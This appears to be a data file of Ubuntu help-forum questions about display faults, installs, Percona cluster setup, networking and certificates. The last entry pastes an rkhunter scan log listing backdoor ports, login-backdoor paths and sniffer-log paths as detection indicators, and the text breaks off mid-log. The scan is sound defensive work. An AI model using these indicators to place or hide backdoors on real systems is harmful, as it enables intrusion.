351979	black screen on macmini 4,1 with mini display to vga adaptre	i 've read all the related topics ... to no avail . i have installed ubuntu 12.04 lts 64bit on a macmini 4,1 with refind . everything works fine except when i connect my vga monitor to the mac through an apple adapter ( minidisplay to vga ) and boot . after the initial loading sequence , right before the password input screen , it goes dark and then the display turns itself off . when i use hdmi to output video to a tv everything works like a charm . any ideeas ?
351983	how to fix off-center display image and cursor/pointer offset	i 'm new to ubuntu and have installed 12.04.1 ( again ) .. already i have worked through getting new display modes into the xorg.conf so i have several valid resolutions to choose from ( initially the nouveau driver only gave me two unacceptable options ) when the gui first starts up , the screen `` image '' is offset in the screen , approximately 20 pixels down and 10 pixels left . the top 20 pixels are a blank color ( sometimes appearing as if the top row of pixels is stretched up to the top of the screen ) , the right 10 pixels are at least a partially wrapped part of the missing left edge of the image . however , the mouse cursor is not experiencing this offset.. as a result , the cursor is offset from the images of any controls one might click by the same 20,10 pixels . ( i have to point with the bottom left edge of the cursor . if i purposely change screen resolutions , the problem goes away and the screen appears correct and the cursor offset is gone ... even if i return to the original resolution . the screen will remain ok until the idle timeout passes and the screen blanks out , or i also noted some applications ( such as movie player ) that might cause the screen to momentarily blank out can trigger a return to the issue . pc compaq presario sr1050nx nvidia gforce 4 mx integrated processor ( some threads have suggested putting in the nvidia drivers , , , but i 'm not going down that path to oblivion a 4th time- living with the offset is less trouble . ) monitor acer x223w interesting i get the same affect running the live cd for ubuntu or lubuntu . is this something that might be fixed using the viewport offsets in the xorg.conf ? at some level internally , the pc itself is not aware of this offset.. i 'm afraid that using an offset will result in an offset in the other direction when i choose a different resolution . or that it may correct the image location , but not the cursor offset . i may test some xrandr commands to see if a short script that flashes between resolutions can correct the issue.. if so maybe i can attach that script to other processes or circumstances where i know it needs to occur . i do n't really want to disable the idle timeout/powersaving feature . any suggestions ? thanks .
351985	installing percona xtradb cluster on ubuntu 13.04	so , a bit of explanation of the big picture : i am trying to get multiple pxc instances running on a single machine , replicating via galera to each other . i am running ubuntu server 13.04 amd64 in a virtualbox ose virtual machine . i installed the percona debian/ubuntu repository and installed percona-xtradb-cluster-server-5.5 , percona-xtrabackup , percona-xtradb-cluster-client-5.5 , percona-xtradb-cluster-common-5.5 , and percona-xtradb-cluster-galera-2.x from there . mysqld -- version shows `` mysqld ver 5.5.33-55 for linux on x86_64 ( percona xtradb cluster ( gpl ) , wsrep_23.7.6.r3915 ) '' . once i had pxc installed , i set up a /data/mysql directory and several /etc/mysql/my . *.cnffiles , one for each node i intended to create.my.galera1.cnf` looks like so : [ mysqld ] port = 5533 socket=/tmp/mysql.galera1.sock datadir=/data/mysql/galera1 # basedir=/usr/bin user=root log_error=error.log innodb_file_per_table # # # galera-required settings # # # query_cache_size=0 binlog_format=row default_storage_engine=innodb innodb_autoinc_lock_mode=2 # innodb_locks_unsafe_for_binlog=1 # # # wsrep basic settings # # # wsrep_provider=/usr/lib/libgalera_smm.so wsrep_cluster_name=boringname wsrep_cluster_address=gcomm : //localhost:5533 , localhost:5534 , localhost:5535 wsrep_sst_method=rsync # wsrep_sst_auth=repluser : replpass wsrep_node_name=node1 wsrep_node_address=localhost:5533 [ mysql ] user=root i then called mysql_install_db -- defaults-file=/etc/mysql/my.galera1.cnf to initialize the data directory , followed by mysqld_safe -- defaults-file=/etc/mysql/my.galera1.cnf -- wsrep-new-cluster . mysqld_safe prints the following to the screen : 130927 23:53:22 mysqld_safe logging to '/data/mysql/galera1/error.log ' . 130927 23:53:22 mysqld_safe starting mysqld daemon with databases from /data/mysql/galera1 130927 23:53:22 mysqld_safe skipping wsrep-recover for empty datadir : /data/mysql/galera1 130927 23:53:22 mysqld_safe assigning 00000000-0000-0000-0000-000000000000 : -1 to wsrep_start_position 130927 23:53:32 mysqld_safe mysqld from pid file /data/mysql/galera1/ubusrv1304-0.pid ended and the following to /data/mysql/galera1/error.log : 130927 23:53:22 mysqld_safe starting mysqld daemon with databases from /data/mysql/galera1 130927 23:53:22 mysqld_safe skipping wsrep-recover for empty datadir : /data/mysql/galera1 130927 23:53:22 mysqld_safe assigning 00000000-0000-0000-0000-000000000000 : -1 to wsrep_start_position 130927 23:53:22 [ note ] wsrep : wsrep_start_position var submitted : '00000000-0000-0000-0000-000000000000 : -1' 130927 23:53:22 [ note ] wsrep : read nil xid from storage engines , skipping position init 130927 23:53:22 [ note ] wsrep : wsrep_load ( ) : loading provider library '/usr/lib/libgalera_smm.so' 130927 23:53:22 [ note ] wsrep : wsrep_load ( ) : galera 2.7 ( r157 ) by codership oy loaded succesfully . 130927 23:53:22 [ warning ] wsrep : could not open saved state file for reading : /data/mysql/galera1//grastate.dat 130927 23:53:22 [ note ] wsrep : found saved state : 00000000-0000-0000-0000-000000000000 : -1 130927 23:53:22 [ note ] wsrep : preallocating 134219048/134219048 bytes in '/data/mysql/galera1//galera.cache ' ... 130927 23:53:22 [ note ] wsrep : passing config to gcs : base_host = localhost ; base_port = 5533 ; cert.log_conflicts = no ; gcache.dir = /data/mysql/galera1/ ; gcache.keep_pages_size = 0 ; gcache.mem_size = 0 ; gcache.name = /data/mysql/galera1//galera.cache ; gcache.page_size = 128m ; gcache.size = 128m ; gcs.fc_debug = 0 ; gcs.fc_factor = 1 ; gcs.fc_limit = 16 ; gcs.fc_master_slave = no ; gcs.max_packet_size = 64500 ; gcs.max_throttle = 0.25 ; gcs.recv_q_hard_limit = 9223372036854775807 ; gcs.recv_q_soft_limit = 0.25 ; gcs.sync_donor = no ; replicator.causal_read_timeout = pt30s ; replicator.commit_order = 3 130927 23:53:22 [ note ] wsrep : assign initial position for certification : -1 , protocol version : -1 130927 23:53:22 [ note ] wsrep : wsrep_sst_grab ( ) 130927 23:53:22 [ note ] wsrep : start replication 130927 23:53:22 [ note ] wsrep : setting initial position to 00000000-0000-0000-0000-000000000000 : -1 130927 23:53:22 [ note ] wsrep : protonet asio version 0 130927 23:53:22 [ note ] wsrep : backend : asio 130927 23:53:22 [ note ] wsrep : gmcast version 0 130927 23:53:22 [ note ] wsrep : ( e6e10868-27f9-11e3-85c4-2672bd9349a7 , 'tcp : //0.0.0.0:5533 ' ) listening at tcp : //0.0.0.0:5533 130927 23:53:22 [ note ] wsrep : ( e6e10868-27f9-11e3-85c4-2672bd9349a7 , 'tcp : //0.0.0.0:5533 ' ) multicast : , ttl : 1 130927 23:53:22 [ note ] wsrep : evs version 0 130927 23:53:22 [ note ] wsrep : pc version 0 130927 23:53:22 [ note ] wsrep : gcomm : connecting to group 'boringname ' , peer '' 130927 23:53:22 [ note ] wsrep : node e6e10868-27f9-11e3-85c4-2672bd9349a7 state prim 130927 23:53:22 [ note ] wsrep : view ( view_id ( prim , e6e10868-27f9-11e3-85c4-2672bd9349a7,1 ) memb { e6e10868-27f9-11e3-85c4-2672bd9349a7 , } joined { } left { } partitioned { } ) 130927 23:53:22 [ note ] wsrep : gcomm : connected 130927 23:53:22 [ note ] wsrep : changing maximum packet size to 64500 , resulting msg size : 32636 130927 23:53:22 [ note ] wsrep : shifting closed - > open ( to : 0 ) 130927 23:53:22 [ note ] wsrep : opened channel 'boringname' 130927 23:53:22 [ note ] wsrep : waiting for sst to complete . 130927 23:53:22 [ note ] wsrep : new component : primary = yes , bootstrap = no , my_idx = 0 , memb_num = 1 130927 23:53:22 [ note ] wsrep : starting new group from scratch : e6e177a0-27f9-11e3-92e7-4b4286f53f4a 130927 23:53:22 [ note ] wsrep : state_exchange : sent state uuid : e6e17ffd-27f9-11e3-8c08-8b5bd34ddb16 130927 23:53:22 [ note ] wsrep : state exchange : sent state msg : e6e17ffd-27f9-11e3-8c08-8b5bd34ddb16 130927 23:53:22 [ note ] wsrep : state exchange : got state msg : e6e17ffd-27f9-11e3-8c08-8b5bd34ddb16 from 0 ( node1 ) 130927 23:53:22 [ note ] wsrep : quorum results : version = 2 , component = primary , conf_id = 0 , members = 1/1 ( joined/total ) , act_id = 0 , last_appl . = -1 , protocols = 0/4/2 ( gcs/repl/appl ) , group uuid = e6e177a0-27f9-11e3-92e7-4b4286f53f4a 130927 23:53:22 [ note ] wsrep : flow-control interval : [ 16 , 16 ] 130927 23:53:22 [ note ] wsrep : restored state open - > joined ( 0 ) 130927 23:53:22 [ note ] wsrep : new cluster view : global state : e6e177a0-27f9-11e3-92e7-4b4286f53f4a:0 , view # 1 : primary , number of nodes : 1 , my index : 0 , protocol version 2 130927 23:53:22 [ note ] wsrep : sst complete , seqno : 0 130927 23:53:22 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : table 'mysql.plugin ' does n't exist 130927 23:53:22 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 130927 23:53:22 innodb : the innodb memory heap is disabled 130927 23:53:22 innodb : mutexes and rw_locks use gcc atomic builtins 130927 23:53:22 innodb : compressed tables use zlib 1.2.3 130927 23:53:22 innodb : using linux native aio 130927 23:53:22 [ note ] wsrep : member 0 ( node1 ) synced with group . 130927 23:53:22 [ note ] wsrep : shifting joined - > synced ( to : 0 ) 130927 23:53:22 innodb : initializing buffer pool , size = 128.0m 130927 23:53:22 innodb : completed initialization of buffer pool innodb : the first specified data file ./ibdata1 did not exist : innodb : a new database to be created ! 130927 23:53:22 innodb : setting file ./ibdata1 size to 10 mb innodb : database physically writes the file full : wait ... 130927 23:53:22 innodb : log file ./ib_logfile0 did not exist : new to be created innodb : setting log file ./ib_logfile0 size to 5 mb innodb : database physically writes the file full : wait ... 130927 23:53:22 innodb : log file ./ib_logfile1 did not exist : new to be created innodb : setting log file ./ib_logfile1 size to 5 mb innodb : database physically writes the file full : wait ... innodb : doublewrite buffer not found : creating new innodb : doublewrite buffer created innodb : 127 rollback segment ( s ) active . innodb : creating foreign key constraint system tables innodb : foreign key constraint system tables created 130927 23:53:22 innodb : waiting for the background threads to start 130927 23:53:23 percona xtradb ( http : //www.percona.com ) 5.5.33-rel31.0 started ; log sequence number 0 130927 23:53:23 [ error ] ca n't start server : bind on tcp/ip port . got error : 98 : address already in use 130927 23:53:23 [ error ] do you already have another mysqld server running on port : 5533 ? 130927 23:53:23 [ error ] aborting 130927 23:53:25 [ note ] wsrep : closing send monitor ... 130927 23:53:25 [ note ] wsrep : closed send monitor . 130927 23:53:25 [ note ] wsrep : gcomm : terminating thread 130927 23:53:25 [ note ] wsrep : gcomm : joining thread 130927 23:53:25 [ note ] wsrep : gcomm : closing backend 130927 23:53:25 [ note ] wsrep : view ( ( empty ) ) 130927 23:53:25 [ note ] wsrep : gcomm : closed 130927 23:53:25 [ note ] wsrep : received self-leave message . 130927 23:53:25 [ note ] wsrep : flow-control interval : [ 0 , 0 ] 130927 23:53:25 [ note ] wsrep : received self-leave . closing connection . 130927 23:53:25 [ note ] wsrep : shifting synced - > closed ( to : 0 ) 130927 23:53:25 [ note ] wsrep : recv thread exiting 0 : success 130927 23:53:25 [ note ] wsrep : recv_thread ( ) joined . 130927 23:53:25 [ note ] wsrep : closing replication queue . 130927 23:53:25 [ note ] wsrep : closing slave action queue . 130927 23:53:25 [ note ] wsrep : service disconnected . 130927 23:53:25 [ note ] wsrep : rollbacker thread exiting 130927 23:53:26 [ note ] wsrep : some threads may fail to exit . 130927 23:53:26 innodb : starting shutdown ... 130927 23:53:27 innodb : shutdown completed ; log sequence number 1597945 130927 23:53:27 [ note ] /usr/sbin/mysqld : shutdown complete error in my_thread_global_end ( ) : 1 threads did n't exit 130927 23:53:32 mysqld_safe mysqld from pid file /data/mysql/galera1/ubusrv1304-0.pid ended seeing the error about binding to port 5533 , i ran netstat -anp | grep 5533 , but got no results , indicating ( i think ) that port 5533 has no process bound to it , in fact . at some point previously , i somehow managed to get the server to at least stay up , and while i could connect to it from the mysql command line client , there was no command that did n't complain that there was no such command . i am thoroughly baffled at what i 'm doing wrong , so any help at all would be very welcome . thank you , everyone , in advance !
351987	consolidation of html files with their folders	i am a linux newbie and i 've been searching for an answer to this question for a long time , and i just do n't know how to find it . is there a way to associate saved html files with their `` files '' folders so that they can be deleted together , like in windows ?
351988	installing tar.gz	greeting humans i am new to ubuntu and linux in general.i am running ubuntu 13.04 ( raring ringtail ) . whenever i try to install something from the internet vs ubuntu software center i get it in a tar.gz file . i am able to extract the files but i do n't know what to do next . i do n't know how to actually install it . help . sos mayday . and whatnot
351991	mounting disk drives among different users	i had this idea about mounting disk drives among different users . i would create a folder called say /media/diskxyz . then i would make a softlink from /media/user1/diskxyz to /media/diskxyz , and from /media/user2/diskxyz to /media/diskxyz . the intention is that two users can have the disk mounted at the same time , and programs that have a folder name hardwired in will work whichever user mounted it . i did n't want to do it because i was n't sure if it was safe . will it work ? is this safe ?
351992	combined address/search bar in firefox	for a long time on windows and osx , firefox has had combined search and address bar without recourse to any addon . i am running ubuntu and the search and address bar is separate and i ca n't find any option to do this in the preferences and about : config . do i have to use an addon ?
351993	how can i backup my windows partition ?	i dropped my laptop . the hard drive is now dead - we think ; but more may be wrong with the laptop and that 's what we are assuming . it is responding , but with long delays and issues . with this in mind , i am assuming the worst and endeavouring to back up my ubuntu 12.04 and windows 7 partitions . this is not without difficulties , however . i have eventually gotten the laptop to boot into a usb linux live version of lubuntu 12.04 . this is what i post to you from ! the problem is i need to create a backup of my two hard disks , as best as i can , from lubuntu , without having to restart ( so no clonezilla etc ! ) as my laptop may not respond again after this ( it allowing me to boot into lubuntu is after many , many failed attempts . i have tried to , from the disks utility , make an image of my harddrives . this fails , and has an error message saying my hard disk had bad sectors . i have tried to open gparted - it stalls and hangs on `` searching /dev/sda partitions . how can i proceed from here to back up my files/hard disks ? i intend to shrink on of the partitions next and install a fresh copy of lubuntu onto the newly freed up partition to see if i can then mount , and access any of the information . is this a good way to proceed ? what advice/recommendations/possibilities can people offer me here ? i want to do my best before trying anything that requires a restart : )
351994	likewise active directory users authentication failure	i have been trying to add my ubuntu box to the windows ad domain . on that box , i see the the domain users when i do lw-enum-users and if i am already logged into my local user , i can 'su ' to a domain user and that works . however , when i switch user , i have to do 'sudo su domain\user' which gives su : authentication failure ( ignored ) and continues to switch me to that user . if i just do a normal su , it gives me authentication failure what i ca n't do , is ssh 'domain\user ' @ host to get into the ubuntu server when i do , i get the following sep 30 15:20:02 ubuntu-trac sshd [ 1420 ] : error : pam : authentication failure for domain\user from 10.22.1.220
351997	add-apt-repository returns `` error : need a repository as argument '' when adding a repo	when trying to install skype ... $ sudo add-apt-repository “deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner” error : need a repository as argument
352001	cant access bios or windows after ubuntu install	i have 2 drives in my laptop ( samsung np530u4c ) , a 120gb ssd and a 25gb msata ssd . i have windows 7 on the 120gb drive and after installing ubuntu 12.04 on the msata i cant access windows or get into the bios anymore . when i select windows 7 in grub it says `` invalid efi file path '' and windows/linux usbs/cds dont show up in grub . the bios boot menu only shows 'ubuntu ' ( no drives or cdrom ) and i cant get into the full bios and no i 'm not pressing the wrong buttons . i tried boot-repair but had no luck . anybody have any suggestions ?
352005	touchpad detected as generic mouse	i 'm running ubuntu 13.04 on a razer blade pro , and my touchpad only works as a generic mouse . so i can use it to move the mouse and click , but no touchpad shows up in settings , and multitouch and scroll features are not available . this is the result of running xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ razer razer blade id=14 [ slave pointer ( 2 ) ] ⎜ ↳ razer razer blade id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ sc-20fhl11149m id=13 [ slave keyboard ( 3 ) ] ↳ razer razer blade id=16 [ slave keyboard ( 3 ) ] ↳ at raw set 2 keyboard id=19 [ slave keyboard ( 3 ) ] is there any way to get my touchpad recognized correctly ?
352006	what went wrong with this partition mount ?	error mounting /dev/sda2 at /run/media/juno/two : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /run/media/aunshi/two '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sda2 ' : eingabe-/ausgabefehler ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . the hdd is gpt formated large disk and the partition in question is the second one . mounting was done simply by double-clicking on the drive . the disk is fine under windows . can someone enlighten me ? thanks .
352007	ubuntu stuck in black screen after pressing power button . proceeds after any key press	i was in 13.04 where suddenly one day , i started to get black screen after pressing power button . it only proceeds if i press space or any other key . i press space key now . then it goes to boot ubuntu with the following . then it enters into the welcome screen . i want to have a normal boot process . i need help . [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^ [ [ 21~^
352010	i ca n't install ubuntu 13.04 on my laptop	i have hp pavilion g6 2010ax laptop running on windows 7 and i want to install ubuntu 13.04 . but problem is that when i select install ubuntu inside windows then suddenly my laptop goes shutdown ... again if i reboot it same thing goes ... i have tried many version like ubuntu 12.04 ,13.04 32 bit/64 bit but problem is same ... .this may be happening because of amd processor ... so plz help me
352015	how to manage imported certificates ?	i 've got a x.509 certificate file ( with a .der file extension ) of a certificate authority that i want to trust ( it 's required to connect to my academic network ) . when i double-click on a .der file i can either import that certificate to the gnome2 key storage or user key storage ( by the way , what 's the difference between those two ? ) . my question is , where these certificates are stored ? i 've check /etc/ssl/certs folder but i could n't find the one that i 've just imported . also , how i can manage certificates after being imported ( list them and remove ) ?
352018	keyboard sensitivity	i 'm running ubuntu 13.04 on a razer blade pro , and unless i press very hard it often does not register key presses ( ex if i lightly press a key ) . are there any settings which let you change the sensitivity on which a key press is detected ?
352030	chrome and catalyst - no tab text	i just installed ubuntu , updated , installed amd proprietary drivers ( for my radeon hd6870 ) and noticed that some ( most ) of the tabs in google chrome do n't have text , only the favicon . my first idea was that maybe 13.10 may have some issues with the new drivers so i switched to the normal driver instead of the beta one . it was not good . okay then , i put back the open source drivers . it worked . okay , it 's strange . let 's install ubuntu gnome to see if it 's unity . no it was not . let 's install ubuntu 13.04 . same behavoir . by this time i was desperate . i installed fedora , the problem was there . now i 'm back to ubuntu 13.10 , but am out of ideas . could anyone help me , please ? p.s . : i can upload a screenshot , if needed .
352033	how to transfer large amount of data from mac to ubuntu computer ?	i 've got a mac laptop from which i want to take all data , and put it on my ubuntu computer . since i do n't have an external drive , i want to do it directly somehow . i 've got the two on the same wifi network , so i suppose i can use that to transfer the ( roughly 200gb of ) data . i 'm not sure how to do this though . i suppose i can use ssh or something , but that 's a bit too advanced . i just want to be able to click around and drag-and-drop the files and folders that i want to transfer . does anybody know an easy way in which i can do this ?
352034	where can i find an iso of 12.04 for arm ?	all i 've found is pxe boot files , but no actual iso image for the whole distribution . i need an iso image because i ca n't get through the firewall to let the machine pull packages directly from the source . so , is there a 12.04 arm image available somewhere ? how do i get it , please ?
352037	permissions issue in eclipse	i am running eclipse indigo in ubuntu 12.04.3 . i checked out a project from subversion and put it in my workspace . when i try to run main.cpp ( it 's a c++ project -- not java ) , i get the following error message : exception occurred executing command line . can not run program `` /home/abramhandler/workspace/tux/main.cpp '' ( in directory `` /home/abramhandler/workspace/tux '' ) : java.io.ioexception : error=13 , permission denied how can i give eclipse permission to run things in this folder ?
352042	update manager problem failed to fetch updates	i have a problem where the update manager would not load all of the sources for updates . here is the error that i am receiving when i press to check for updates . w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/precise/main/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i tried selecting different sources from the servers and no matter which one i choose i still get the error message . i am also receiving one more 404 error but i cant post it because of link limitation .
352046	can i install ubuntu on my acer x483 with linpus lite preinstalled , if so how ?	please help me install ubuntu on my acer travelmate x483 with preinstalled linpus lite . i am new to all this , so im going in blind . all help is greatly aprreciated . thanks in advanced .
352047	conected to wireless but ca n't access any page	i installed ubuntu 13.04 in an acer apire one notebook . i can access my wireless conection and even i can use ssh but i ca n't go to any page using firefox or chromium . where is the problem ?
352050	i have 10.10 and when i go to update i get an error message when i try to open update manager , what should i do ?	so every time i attempt to update from 10.10 the upgrade manager gives me an error message . i do n't know where to go from here .
352052	/etc/environment with usepam set to no	i 've disabled password logins to my computer and have set usepam no in sshd.conf . my understanding is that /etc/environment will now not be read ( because pam is disabled ) . is this true and if so , where can i place system wide environmental variables ? i 'm running 12.04 64-bit .
352059	opengl help how to turn on direct rendering	i did glxinfo and gotdirect rendering : no ( if you want to find out why , try setting libgl_debug=verbose ) i did libgl_debug=verbose and nothing happened . how do you turn on direct rendering ? when i start steam i get : opengl glx context is not using direct rendering . it will start but the images are white blocks
352060	wireless intermittently stops working in ubuntu : what do i do next ?	i know that it can be hard to get wireless setup/configured in ubuntu linux . i have ubuntu 12.04.3 running on a vmware fusion machine ( v6 ) . the wireless internet sometimes works and sometimes does n't . i do n't make any changes to the networking configurations in the gui and do n't mess with the drivers . it just sometimes works and sometimes does n't . the wireless works on my computer outside the virtual machine . what might be going on ? how do i debug it ?
352061	projector does n't detect ubuntu , ubuntu thinks projector is connected	i have been using a 720p projector ( optoma hd70 ) with my laptop ( toshiba satellite r830 ) for the past six months on ubuntu over hdmi and never had a problem . i 've upgraded to a 1080p projector , optoma hd230x , and ubuntu detects it . the laptop shows it in display settings , with correct resolution and the make of the projector and creates the extended desktop . the projector does n't detect it and keeps cycling through its inputs , so the laptop screen flickers and dances every time it reaches the input the laptop is plugged into . the projector works with my ps3 so i 'm assuming the problem is ubuntu related ! any way i can fix this ? thanks in advance !
352063	unable to install ubuntu 13.04 on alienware 17	so i go to boot ubuntu from usb and i get to the ubuntu boot screen , but when i go to install it i get a black screen but i hear the sounds . my computer uses uefi with secure boot ; when i turn it off it does not fix the issue , same with legacy boot . it should also be noted that legacy boot makes it so it does n't recognize win 8 ( already installed ) . can anyone assist with this issue ?
352065	unable to boot from iso image	i have installed ubuntu 13.04 on vmplayer . now i want to increase the primary partition size . in the virtual machine setting , i gave iso image ( 13.04 ) path to cd drive . after booting the vm , i tried to get into bios menu by pressing f2 ( tried all keys ! ! ) but was not successful . also please let me know how can i increase the primary partition size . please give me some solution . thanks in advance .
352067	help starting ubuntu from bootable usb	this issue has been bothering me for days and i can not figure it out . i do not know where to begin looking for help , so i figured that i would ask here and hopefully someone may help me . i have limited knowledge of how computers work , so please bare with me as i stumble through this . i downloaded ubuntu 12.04.3 desktop and proceeded to make my external hard drive ( a maxtor onetouch 4 mini ) into a bootable usb for this hand-me-down rig i recently received . initially , it worked perfectly fine . however , i attempted to format my external and reconvert it into a bootable usb upon purchasing a ssd ( samsung 840 series 2.5 '' sata iii internal ) for the rig . with the ssd plugged in , the rig would refuse to boot up at all . i unplugged it with just my external and it would boot up just fine in the past . i followed the same steps as i did previously to make a bootable usb , but for some reason , whenever i plug my external into the rig to boot up ubuntu , it would stall on what appears to be a cmd screen . pressing random keys would result in a `` unable to locate kernal image x '' and no basic command seems to work . the ssd is unplugged , i 've formatted the external , and i 'm still getting stuck on the above screen . i 'm at a loss as to what to do .
352072	extracting a zip file in my machne givs me crc error ?	i have a large zip that contain hundreds of files . i 've unzip'ed it in more than one machine and did n't have any problem before . however , for this particular machine ( ubuntu server 12.04 ) i keep getting crc error for some of the files inside my zip . i 've unzip'ed the same file on anther machine just to check if the file itself is corrupted , however it seems to be fine . any clue ?
352076	rkhunter says apps not checked at users request . thats news to me	i just ran rkhunter for the first time on a new system . i used the following commands in this order . sudo rkhunter -- update sudo rkhunter -- propupd sudo rkhunter -- check after posting this , i ran it again asking for verbose output and got a zero output report . whoever it is they 're quick on the draw but obviously do n't have a background in linux , although their technology is something else . i noticed that the log noted that apps and hidden apps were disabled at the users request . i was that user and did n't request that . am i missing something in the logic or is there something wrong here . here 's a relevant part of the log . what caused rkhunter to not check hidden processes and the apps ? or is this normal behavior ? [ 15:56:55 ] info : test 'hidden_procs ' disabled at users request . [ 15:56:55 ] [ 15:56:55 ] info : test 'suspscan ' disabled at users request . [ 15:56:55 ] [ 15:56:55 ] info : starting test name 'other_malware ' [ 15:56:55 ] performing check for login backdoors [ 15:56:55 ] checking for '/bin/.login ' [ not found ] [ 15:56:55 ] checking for '/sbin/.login ' [ not found ] [ 15:56:55 ] checking for login backdoors [ none found ] [ 15:56:55 ] [ 15:56:55 ] performing check for suspicious directories [ 15:56:55 ] checking for directory '/usr/x11r6/bin/. , /copy ' [ not found ] [ 15:56:55 ] checking for directory '/dev/rd/cdb ' [ not found ] [ 15:56:55 ] checking for suspicious directories [ none found ] [ 15:56:55 ] [ 15:56:55 ] checking for software intrusions [ skipped ] [ 15:56:55 ] info : check skipped - tripwire not installed [ 15:56:55 ] [ 15:56:55 ] performing check for sniffer log files [ 15:56:55 ] checking for file '/usr/lib/libice.log ' [ not found ] [ 15:56:55 ] checking for file '/dev/prom/sn.l ' [ not found ] [ 15:56:55 ] checking for file '/dev/fd/.88/zxsniff.log ' [ not found ] [ 15:56:55 ] checking for sniffer log files [ none found ] [ 15:56:55 ] [ 15:56:55 ] info : starting test name 'trojans ' [ 15:56:55 ] performing trojan specific checks [ 15:56:55 ] checking for enabled inetd services [ skipped ] [ 15:56:55 ] info : check skipped - file '/etc/inetd.conf ' does not exist . [ 15:56:55 ] [ 15:56:55 ] performing check for enabled xinetd services [ 15:56:55 ] checking for enabled xinetd services [ skipped ] [ 15:56:55 ] info : check skipped - file '/etc/xinetd.conf ' does not exist . [ 15:56:55 ] info : apache backdoor check skipped : apache modules and configuration directories not found . [ 15:56:55 ] [ 15:56:55 ] info : starting test name 'os_specific ' [ 15:56:55 ] performing linux specific checks [ 15:56:55 ] checking loaded kernel modules [ ok ] [ 15:56:56 ] info : using modules pathname of '/lib/modules/3.2.0-54-generic ' [ 15:56:56 ] checking kernel module names [ ok ] [ 15:56:58 ] [ 15:56:58 ] info : starting test name 'network ' [ 15:56:58 ] checking the network ... [ 15:56:58 ] [ 15:56:58 ] performing checks on the network ports [ 15:56:58 ] info : starting test name 'ports ' [ 15:56:58 ] performing check for backdoor ports [ 15:56:58 ] checking for tcp port 1524 [ not found ] [ 15:56:58 ] checking for tcp port 1984 [ not found ] [ 15:56:59 ] checking for udp port 2001 [ not found ] [ 15:56:59 ] checking for tcp port 2006 [ not found ] [ 15:56:59 ] checking for tcp port 2128 [ not found ] [ 15:56:59 ] checking for tcp port 6666 [ not found ] [ 15:56:59 ] checking for tcp port 6667 [ not found ] [ 15:56:59 ] checking for tcp port 6668 [ not found ] [ 15:56:59 ] checking for tcp port 6669 [ not found ] [ 15:56:59 ] checking for tcp port 7000 [ not found ] [ 15:56:59 ] checking for tcp port 13000 [ not found ] [ 15:56:59 ] checking for tcp port 14856 [ not found ] [ 15:56:59 ] checking for tcp port 25000 [ not found ] [ 15:56:59 ] checking for tcp port 29812 [ not found ] [ 15:57:00 ] checking for tcp port 31337 [ not found ] [ 15:57:00 ] checking for tcp port 32982 [ not found ] [ 15:57:00 ] checking for tcp port 33369 [ not found ] [ 15:57:00 ] checking for tcp port 47107 [ not found ] [ 15:57:00 ] checking for tcp port 47018 [ not found ] [ 15:57:00 ] checking for tcp port 60922 [ not found ] [ 15:57:00 ] checking for tcp port 62883 [ not found ] [ 15:57:00 ] checking for tcp port 65535 [ not found ] [ 15:57:00 ] checking for backdoor ports [ none found ] [ 15:57:00 ] [ 15:57:00 ] info : starting test name 'hidden_ports ' [ 15:57:00 ] checking for hidden ports [ skipped ] [ 15:57:00 ] info : unable to find the 'unhide-tcp ' command [ 15:57:00 ] [ 15:57:00 ] performing checks on the network interfaces [ 15:57:00 ] info : starting test name 'promisc ' [ 15:57:00 ] checking for promiscuous interfaces [ none found ] [ 15:57:00 ] [ 15:57:00 ] info : test 'packet_cap_apps ' disabled at users request . [ 15:57:00 ] [ 15:57:00 ] info : starting test name 'local_host ' [ 15:57:00 ] checking the local host ... [ 15:57:00 ] [ 15:57:00 ] info : starting test name 'startup_files ' [ 15:57:00 ] performing system boot checks [ 15:57:01 ] checking for local host name [ found ] [ 15:57:01 ] [ 15:57:01 ] info : starting test name 'startup_malware ' [ 15:57:01 ] checking for system startup files [ found ] [ 15:57:02 ] checking system startup files for malware [ none found ] [ 15:57:02 ] [ 15:57:02 ] info : starting test name 'group_accounts ' [ 15:57:02 ] performing group and account checks [ 15:57:02 ] checking for passwd file [ found ] [ 15:57:02 ] info : found password file : /etc/passwd [ 